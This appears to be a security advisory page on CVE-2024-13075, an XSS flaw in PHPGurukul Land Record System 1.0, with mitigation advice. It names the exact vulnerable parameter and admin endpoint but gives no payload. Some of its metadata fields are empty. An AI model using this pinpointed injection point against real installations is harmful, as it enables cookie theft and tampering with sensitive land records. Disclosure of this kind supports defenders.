Platform
php
Component
land-record-system
Fixed in
1.0.1
CVE-2024-13075 is a problematic cross-site scripting (XSS) vulnerability affecting PHPGurukul Land Record System versions 1.0 through 1.0. This flaw allows attackers to inject malicious scripts into the application, potentially leading to session hijacking or defacement. A fix is available in version 1.0.1, and the vulnerability details have been publicly disclosed.
The XSS vulnerability in Land Record System allows an attacker to inject arbitrary JavaScript code into the application's web pages. This can be exploited by crafting a malicious URL or injecting code through user input fields, specifically the 'Land Property Type' parameter in the /admin/add-propertytype.php file. Successful exploitation could allow an attacker to steal user session cookies, redirect users to phishing sites, or modify the content of the web page displayed to other users. The impact is amplified if the application is used to manage sensitive land records, as an attacker could potentially alter or view confidential information.
This vulnerability has been publicly disclosed, increasing the risk of exploitation. While the CVSS score is LOW, the ease of exploitation and potential impact on sensitive data warrant immediate attention. No known active campaigns targeting this specific vulnerability have been reported at the time of writing, but the public disclosure makes it a potential target for opportunistic attackers. The vulnerability was published on 2024-12-31.
Exploit Status
EPSS
0.13% (32% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2024-13075 is to upgrade to version 1.0.1 of PHPGurukul Land Record System. If upgrading is not immediately feasible, consider implementing input validation and output encoding on the 'Land Property Type' field in /admin/add-propertytype.php to sanitize user input. Web application firewalls (WAFs) configured to detect and block XSS payloads can also provide a temporary layer of protection. Regularly review and update the application's codebase to address potential security vulnerabilities.
Update to a patched version or apply necessary security measures to prevent malicious code injection through the 'Land Property Type' field in the file /admin/add-propertytype.php. Implement server-side input validation and sanitization to prevent XSS attacks. Consider using context-specific escaping functions for data output.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2024-13075 is a cross-site scripting (XSS) vulnerability in PHPGurukul Land Record System versions 1.0 through 1.0, allowing attackers to inject malicious scripts.
You are affected if you are using PHPGurukul Land Record System version 1.0. Upgrade to version 1.0.1 to mitigate the risk.
Upgrade to version 1.0.1. If immediate upgrade is not possible, implement input validation and output encoding.
While no active campaigns are currently confirmed, the public disclosure increases the risk of exploitation.
Refer to the PHPGurukul website or security advisories for the official advisory regarding CVE-2024-13075.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.